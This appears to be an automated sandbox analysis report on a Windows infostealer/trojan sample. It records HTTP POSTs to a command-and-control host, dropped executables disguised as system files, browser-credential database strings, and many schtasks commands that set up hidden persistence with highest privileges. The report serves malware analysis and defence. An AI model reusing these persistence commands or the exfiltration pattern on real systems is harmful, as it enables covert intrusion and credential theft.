                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1780Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 155636Expect: 100-continueConnection: Keep-Alive
                                    Source: global traffic
                                    HTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                    Host: 126987cm.renyash.ru
                                    Content-Length: 1788
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Source: global traffic
                                    HTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                    Host: 126987cm.renyash.ru
                                    Content-Length: 1060
                                    Expect: 100-continue
                                    Source: global traffic
                                    HTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                    Host: 126987cm.renyash.ru
                                    Content-Length: 1064
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Source: global traffic
                                    HTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                    Host: 126987cm.renyash.ru
                                    Content-Length: 1764
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Source: global traffic
                                    HTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                    Host: 126987cm.renyash.ru
                                    Content-Length: 1064
                                    Expect: 100-continue
                                    Source: global traffic HTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 126987cm.renyash.ru Content-Length: 1772 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 126987cm.renyash.ru Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
                                    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global traffic DNS traffic detected: DNS query: 126987cm.renyash.ru
                                    Source: unknown HTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 126987cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://126987cm.reP
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002819000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.00000000027A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://126987cm.renyash.ru
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://126987cm.renyash.ru/
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002819000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.00000000027A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://126987cm.renyash.ru/VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php
                                    Source: bridgeportDhcpcommon.exe, 00000005.00000002.1918124129.0000000003C2C000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.dr String found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: 3HKlYiBUaw.21.dr, 85gJ790riI.21.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe Window created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exe Code function: 0_2_008A6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_008A6FAA
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe File created: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe File created: C:\Windows\apppatch\8e809f57164876
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMP
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File deleted: C:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMP
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 45_2_00007FFD9BAC056645_2_00007FFD9BAC0566
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 45_2_00007FFD9BAE200045_2_00007FFD9BAE2000
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeCode function: 45_2_00007FFD9BAB0D7445_2_00007FFD9BAB0D74
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AjJOuhvp.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: String function: 008BF5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: String function: 008BEC50 appears 56 times
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: String function: 008BEB78 appears 39 times
                                    Source: 544WP3NHaP.exe, 00000000.00000003.1655721300.0000000002B74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs 544WP3NHaP.exe
                                    Source: 544WP3NHaP.exe, 00000000.00000002.1657019951.0000000002B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs 544WP3NHaP.exe
                                    Source: 544WP3NHaP.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 544WP3NHaP.exe
                                    Source: 544WP3NHaP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: bridgeportDhcpcommon.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe0.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe1.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe2.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: SearchApp.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@48/46@1/1
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008A6C74 GetLastError,FormatMessageW,0_2_008A6C74
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_008BA6C2
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Users\user\Desktop\qeNySdhc.log
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_03
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMutant created: NULL
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-ifozT5IhpWQVKWPrvZtc
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_03
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile created: C:\Users\user\AppData\Local\Temp\55jg4js0
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgemssurrogateintonet\7tLztOWB7CeM.bat" "
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCommand line argument: sfxname0_2_008BDF1E
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCommand line argument: sfxstime0_2_008BDF1E
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCommand line argument: STARTDLG0_2_008BDF1E
                                    Source: 544WP3NHaP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 544WP3NHaP.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeFile read: C:\Windows\win.ini
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                    Source: Hy21lrSobx.21.dr, x5Q8jyiXXr.21.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: 544WP3NHaP.exeVirustotal: Detection: 55%
                                    Source: 544WP3NHaP.exeReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeFile read: C:\Users\user\Desktop\544WP3NHaP.exe
                                    Source: unknownProcess created: C:\Users\user\Desktop\544WP3NHaP.exe "C:\Users\user\Desktop\544WP3NHaP.exe"
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgemssurrogateintonet\QHbd8WvF.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgemssurrogateintonet\7tLztOWB7CeM.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe "C:\bridgemssurrogateintonet/bridgeportDhcpcommon.exe"
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SearchApp.exe'" /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 12 /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES26F0.tmp" "c:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMP"
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: unknownProcess created: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe "C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: unknownProcess created: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe "C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 12 /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 13 /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 12 /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 8 /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bridgeportDhcpcommonb" /sc MINUTE /mo 8 /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bridgeportDhcpcommon" /sc ONLOGON /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bridgeportDhcpcommonb" /sc MINUTE /mo 12 /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /rl HIGHEST /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xNnAMDzXoE.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: unknownProcess created: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                    Source: unknownProcess created: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                    Source: unknownProcess created: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                    Source: unknownProcess created: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe "C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe"
                                    Source: unknownProcess created: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: version.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: windows.storage.dllJump to behavior
